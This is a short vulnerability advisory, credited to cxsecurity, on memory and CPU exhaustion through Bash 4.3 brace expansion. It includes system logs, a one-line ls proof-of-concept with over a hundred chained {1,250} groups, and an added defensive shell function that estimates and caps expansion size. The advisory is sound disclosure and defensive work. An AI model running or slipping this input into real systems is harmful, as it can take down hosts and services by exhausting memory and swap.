Bash 4.3 uncontrolled resources exhaustion
-------------------------------------------------------------
Date: 26.04.2015
Credit: Maksymilian Arciemowicz from cxsecurity.com
Issue type: CWE-399 Resource exhaustion
-------------------------------------------------------------
=============================================================
Description:
A memory and CPU exhaustion vulnerability exists in bash's expansion of a specially crafted string before it is used: a short brace pattern expands to an enormous argument list, consuming all available memory and swap.
=============================================================
Symptoms:
Memory exhaustion was observed in kernel_task and in the bash process under Mac OS X 10.10.3:
-------------------------------------------------------------
0 kernel_task 236.0 04:17.95 170/10 0 2 9028M+ 0B 0B 0 0 running...
623 bash 15.6 02:08.22 1 0 15 3331M- 0B 31G+ 623 622 stuck...
-------------------------------------------------------------
Under FreeBSD:
-------------------------------------------------------------
Apr 26 12:25:43 kernel: swap_pager_getswapspace(16): failed
Apr 26 12:25:43 kernel: pid 771 (bash), uid 1001, was killed: out of swap space
-------------------------------------------------------------
The same exhaustion also occurs with tcsh:
-------------------------------------------------------------
Apr 26 12:22:35 kernel: swap_pager_getswapspace(16): failed
Apr 26 12:22:35 last message repeated 3 times
Apr 26 12:22:35 kernel: pid 749 (tcsh), uid 1001, was killed: out of swap space
-------------------------------------------------------------
=============================================================
PoC:
# ls .{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}
=============================================================
Prevention:
If resource exhaustion occurs, kill the parent process or restart the affected services (httpd, etc.).
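As an added example (not part of the advisory), a POSIX shell guard that estimates how many words a brace pattern would produce before a wrapper hands user-supplied input to a shell; the function names and the 1,000,000-word limit are assumptions.

```shell
#!/bin/sh
# Added example, not from the advisory: estimate the size of a brace
# expansion BEFORE letting a shell expand it. Brace expansion is
# multiplicative: every {a,b} group doubles the word list, so a pattern
# with N copies of {1,250} asks for 2^N words, which is what drives bash
# and the kernel into swap in the logs above. A wrapper that accepts
# user-supplied patterns can refuse such input up front.
# Handles flat comma lists only; ranges ({1..9}) and nesting are not counted.

estimate_brace_words() {
    pattern=$1
    count=1
    limit=${2:-1000000}        # assumed cap; stop multiplying beyond it
    while :; do
        # need a '{' with a '}' somewhere after it, otherwise we are done
        case $pattern in *\{*\}*) ;; *) break ;; esac
        rest=${pattern#*\{}        # text after the first '{'
        group=${rest%%\}*}         # contents up to the next '}'
        pattern=${rest#*\}}        # continue after that '}'
        alts=1                     # one alternative per comma, plus one
        tmp=$group
        while :; do
            case $tmp in *,*) alts=$((alts + 1)); tmp=${tmp#*,} ;; *) break ;; esac
        done
        count=$((count * alts))
        if [ "$count" -gt "$limit" ]; then
            echo "$count"
            return 1               # refuse: expansion would exceed the limit
        fi
    done
    echo "$count"
    return 0
}

# Build a pattern shaped like the advisory's PoC (N copies of .{1,250})
# without ever expanding it, so the guard can be exercised safely.
poc_like_pattern() {
    n=$1
    p=""
    while [ "$n" -gt 0 ]; do p="$p.{1,250}"; n=$((n - 1)); done
    echo "$p"
}
```

A return value of 1 means the pattern should be rejected rather than passed to bash; the echoed count is the size it would have expanded to when the limit was crossed.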
=============================================================
Credit:
Flaw disclosed by Maksymilian Arciemowicz from cxsecurity and cifrex Team.
Follow our new bugtraq https://cxsecurity.com